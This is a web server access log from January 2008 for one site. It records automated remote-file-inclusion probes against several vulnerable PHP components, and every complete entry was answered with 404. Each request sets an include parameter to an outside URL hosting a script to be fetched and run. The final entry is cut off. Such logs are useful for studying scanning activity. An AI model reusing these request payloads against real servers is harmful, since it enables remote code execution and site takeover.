209.90.77.54 - - [13/Jan/2008:10:12:54 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://geocities.com/carneline0817/tools/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.32.128.178 - - [13/Jan/2008:10:13:06 -0800] "GET /page.php?p=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.234.144 - - [13/Jan/2008:10:13:24 -0800] "GET /logs/access_071229.log/tiny_includes/config.php?dir_ws=http://img85.imageshack.us/img85/880/zdxosju1.gif?& HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.234.144 - - [13/Jan/2008:10:14:57 -0800] "GET /logs/access_071216.log/tiny_includes/config.php?dir_ws=http://img85.imageshack.us/img85/880/zdxosju1.gif?& HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.75.2 - - [13/Jan/2008:10:16:32 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.90.77.54 - - [13/Jan/2008:10:17:25 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://geocities.com/carneline0817/tools/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.88.242 - - [13/Jan/2008:10:18:33 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.88.242 - - [13/Jan/2008:10:18:34 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.88.242 - - [13/Jan/2008:10:18:34 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
147.210.86.38 - - [13/Jan/2008:10:21:41 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
147.210.86.38 - - [13/Jan/2008:10:21:41 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
147.210.86.38 - - [13/Jan/2008:10:21:42 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [13/Jan/2008:10:22:15 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.77.54 - - [13/Jan/2008:10:23:59 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://geocities.com/carneline0817/tools/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.141.167 - - [13/Jan/2008:10:24:50 -0800] "GET /logs/access_071214.log//advguestbook/admin.php?include_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [13/Jan/2008:10:24:50 -0800] "GET //advguestbook/admin.php?include_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [13/Jan/2008:10:24:50 -0800] "GET /logs//advguestbook/admin.php?include_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [13/Jan/2008:10:25:54 -0800] "GET /logs/access_071214.log//advguestbook/admin.php?include_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [13/Jan/2008:10:25:55 -0800] "GET //advguestbook/admin.php?include_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [13/Jan/2008:10:25:55 -0800] "GET /logs//advguestbook/admin.php?include_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
124.32.128.178 - - [13/Jan/2008:10:26:37 -0800] "GET /logs/access_071229.log/page.php?p=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.32.128.178 - - [13/Jan/2008:10:26:37 -0800] "GET /logs/page.php?p=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.2.45.165 - - [13/Jan/2008:10:27:04 -0800] "GET /page.php?p=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.141.167 - - [13/Jan/2008:10:27:53 -0800] "GET //advguestbook/admin.php?include_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [13/Jan/2008:10:28:53 -0800] "GET //advguestbook/admin.php?include_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.44.188.10 - - [13/Jan/2008:10:29:16 -0800] "GET //login.php?dir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbro